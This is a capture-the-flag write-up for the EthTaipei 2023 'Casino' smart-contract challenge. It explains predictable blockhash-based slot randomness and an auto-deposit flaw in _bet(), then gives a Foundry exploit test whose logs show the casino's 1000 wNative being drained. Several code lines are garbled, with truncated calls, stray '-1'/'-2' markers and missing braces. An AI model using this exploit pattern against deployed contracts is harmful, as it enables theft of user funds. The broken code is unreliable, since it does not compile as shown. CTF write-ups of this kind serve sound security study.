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EthTaipei CTF 2023 - Casino

  • Scope
    • Casino.sol
    • WNative.sol
  • Tools


Vulnerability Details

  1. slot() has poor randomness vulnerability and the result can be calculated
  2. _bet() deposits the token for you if you do not have enough tokens
-1 function slot() public view returns (uint256) {
        unchecked {
            uint256 answer = uint256(blockhash(block.number - 1)) % 1000;
            uint256[3] memory slots = [(answer / 100) % 10, (answer / 10) % 10, answer % 10];
            if (slots[0] == slots[1] && slots[1] == slots[2]) {
                if (slots[0] == 7) {
                    return 100;
                } else {
                    return 10;
            } else if (slots[0] == slots[1] || slots[1] == slots[2] || slots[0] == slots[2]) {
                return 3;
            } else {
                return 0;

function _bet(address token, uint256 amount) internal {
        require(isAllowed(token), "Token not allowed");
        CasinoToken cToken = CasinoToken(token);
        try, amount) {}
        catch {
            cToken = CasinoToken(_tokenMap[token]);
-2            deposit(token, amount);
  , amount);

Impact/Proof of Concept

  1. Manually tested and block.number 4 returns slot of multiplier 3
  2. Call play() with an amount (uint256(1000e18) / 3 + 1) that will win us 1000e18 wNative tokens, even though we don't have enough tokens deposited, the casino will help us to deposit for the bet
  3. Call withdraw() and drain the casino's wNative tokens
function test_Exploit() public {
        // 1. Manually tested and block.number 4 returns slot of multiplier 3
        // 2. Call play() with an amount (uint256(1000e18) / 3 + 1) that will win us 1000e18 wNative tokens
        // 3. Call withdraw() and drain the casino's wNative tokens

        WrappedNative wToken = base.wNative();
        uint256 slot = casino.slot();
        console.log("slot: ", slot);
        console.log("blockNumber: ", block.number);
        console.log("my beforeWNative: ", wToken.balanceOf(address(this)) / 1e18);
        console.log("casino beforeWNative: ", wToken.balanceOf(address(casino)) / 1e18);

        require(slot > 0, "Slot == 0");
       , uint256(1000e18) / 3 + 1); // +1 is because 333e18 * 3(slot) = 999e18 wNative tokens only. Hence we need to +1 so we are able to withdraw and burn 1000e18
        casino.withdraw(wNative, 1000e18);
        console.log("my afterWNative: ", wToken.balanceOf(address(this)) / 1e18);
        console.log("casino afterWNative: ", wToken.balanceOf(address(casino)) / 1e18);


[PASS] test_Exploit() (gas: 8937393460516843958)
  blockNumber:  4
  slot:  3
  my beforeWNative:  0
  casino beforeWNative:  1000
  my afterWNative:  1000
  casino afterWNative:  0